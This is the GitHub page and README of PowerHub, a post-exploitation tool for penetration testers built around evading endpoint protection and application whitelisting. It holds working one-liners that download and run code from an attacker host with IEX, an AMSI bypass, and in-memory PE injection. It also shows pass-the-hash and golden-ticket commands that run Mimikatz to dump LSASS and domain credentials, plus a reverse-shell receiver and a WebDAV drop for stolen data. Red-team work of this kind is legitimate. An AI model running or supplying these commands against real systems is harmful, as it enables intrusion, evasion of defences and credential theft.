Skip to content
A post exploitation tool based on a web application, focusing on bypassing endpoint protection and application whitelisting
Branch: master
Clone or download
Latest commit e274c6b Apr 24, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
binary
img update images Apr 24, 2019
powerhub add ability to set delay and lifetime of reverse shell; close #18 Apr 24, 2019
.gitignore change webdav root Apr 10, 2019
LICENSE Create LICENSE Mar 14, 2019
README.md readme: mention edit mode in local shell Apr 23, 2019
ph don't read from pipe if it's empty Apr 24, 2019
powerhub.py disable flask reloader Apr 23, 2019
requirements.txt requirements: greater or equal instead equal for wsgidav Apr 22, 2019

README.md

PowerHub

PowerHub is a convenient post exploitation tool which aids a pentester in transferring files, in particular code which may get flagged by endpoint protection.

PowerHub Webapp

During an engagement where you have a test client available, one of the first things you want to do is run PowerSploit. So you need to download the files, messing with endpoint protection, disable the execution policy, etc. PowerHub provides an (almost) one-click-solution for this. Oh, and you can also run arbitrary binaries (PE and shell code) entirely in-memory using PowerSploit's modules, which is sometimes useful to bypass application whitelisting.

Your loot (Kerberos tickets, passwords, etc.) can be easily transferred back either as a file or a text snippet, via the command line or the web interface. PowerHub also helps with collaboration in case you're a small team.

On top of that, PowerHub comes with a powerful reverse PowerShell, making it suitable for any kind of post-exploitation action.

Here is a simple example (grab information about local groups with PowerView and transfer it back):

PS C:\Users\avollmer> $K=new-object net.webclient;$K.proxy=[Net.WebRequest]::GetSystemWebProxy();$K.Proxy.Credent
ials=[Net.CredentialCache]::DefaultCredentials;IEX $K.downloadstring('http://192.168.11.2:8000/0');
  _____   _____  _  _  _ _______  ______ _     _ _     _ ______
 |_____] |     | |  |  | |______ |_____/ |_____| |     | |_____]
 |       |_____| |__|__| |______ |    \_ |     | |_____| |_____]
                            written by Adrian Vollmer, 2018-2019
Run 'Help-PowerHub' for help
AmsiScanBuffer patch has been applied.
0
PS C:\Users\avollmer> lhm powerview
[*] /ps1/PowerSploit/Recon/PowerView.ps1 imported.
PS C:\Users\avollmer> Get-LocalGroup | ConvertTo-Json | Out-file groups.json
PS C:\Users\avollmer> pth groups.json

PowerHub in action

How it works

The web application is made with Flask and consists of four parts.

The Hub

The hub uses PowerShell to load modules and binaries in memory. The binaries can be executed directly from memory with PowerSploit's Invoke-ReflectivePEInjection.

Modules have to be placed in ./modules and can be either PowerShell scripts, .NET or PE executables, or shell code. You can load them on the target via PowerShell with Load-HubModule. Run Help-PowerHub for more information.

PowerHub on the attacker system simply looks for *.ps1 or *.exe files. They need to be in their respective directory, though, so exe files need to be in modules/exe (or at least symlinked), and so forth. The *.ps1 files are imported on the target via [Scriptblock]::Create().

A simple interface to install modules is provided for your convenience.

The Receiver

The receiver catches incoming reverse shells and lists them here. Each shell receives a random ID consisting of an eight digit hex string. You can interact with it by executing the accompanying script: ./ph <ID>.

This lands you inside a PowerShell instance. It's a nice shell, too: It supports colors, a history, tab completion, vim/emacs edit modes, it respects your terminal's column count and accidentally pressing CTRL+C is not a big deal - simply reconnect to it.

The Clipboard

The clipboard functionality is meant for exchanging small snippets, such as hashes, passwords, one-liners, and so forth. It's like an extremely basic Etherpad or a guest book, but non-persistent.

The File Exchange

The file exchange offers a way to transfer files via HTTP back to the host. Think Droopy.

If you have the necessary Python modules installed, a WebDAV service is also started. You can mount it on the target as a network drive with Mount-WebDAV (as 'S:' by default). It allows for anonymous login and it contains three folders:

  • public with read/write access for everyone
  • ro with read only access for everyone -- maybe you can bypass a weak anti virus with this
  • blackhole for dropping sensitive data. Any file placed here via WebDAV will immediately be moved to the blackhole directory in the script's root directory.

The dependencies for the WebDAV service are wsgidav (installable via pip3), cheroot and watchdog.

Usage

PowerHub has two mandatory arguments: the first is the callback host (can be an IP address) and the second is either --auth <user>:<pass> or --no-auth. The latter disables basic authentication which is not recommended. This host name is used by the stager to download the payload. If the callback port or path differ from the default, it can also be changed.

Read ./powerhub.py --help for details.

Examples

One nice application is, for example, the case where you have obtained some local administrator password hash and want to move laterally. This dumps the LSASS creds with Mimikatz via Impacket's wmiexec.py, tricking many endpoint protection tools:

wmiexec.py -hashes :deadbeef0000000000000000deadbeef \
    ./administrator@10.0.1.4  \
    'powershell -c "$K=new-object net.webclient;IEX $K.downloadstring(\"http://10.0.100.13:8000/0\"); Load-Hubmodule Mimikatz ; Invoke-Mimikatz -DumpCreds "'

Or similarly, if you obtained the krbtgt hash and created a golden ticket which you injected with Mimikatz. Then you can get the NTLM hash of any arbitrary user in the forest:

PS C:\Users\pentestuser> .\PsExec64.exe \\DC01.acme.local -s powershell -c '$K=new-object net.webclient;IEX $K.downloadstring(\"http://192.168.1.5:8000/0\");load-hubmodule mimikatz; Invoke-Mimikatz -Command ''\"lsadump::lsa /inject /name:adm_targetuser\"'''

Getting the escape sequence on the quotes right can be tough...

Author

Adrian Vollmer, 2018-2019

Disclaimer

Use at your own risk. Do not use without full consent of everyone involved. For educational purposes only.

You can’t perform that action at this time.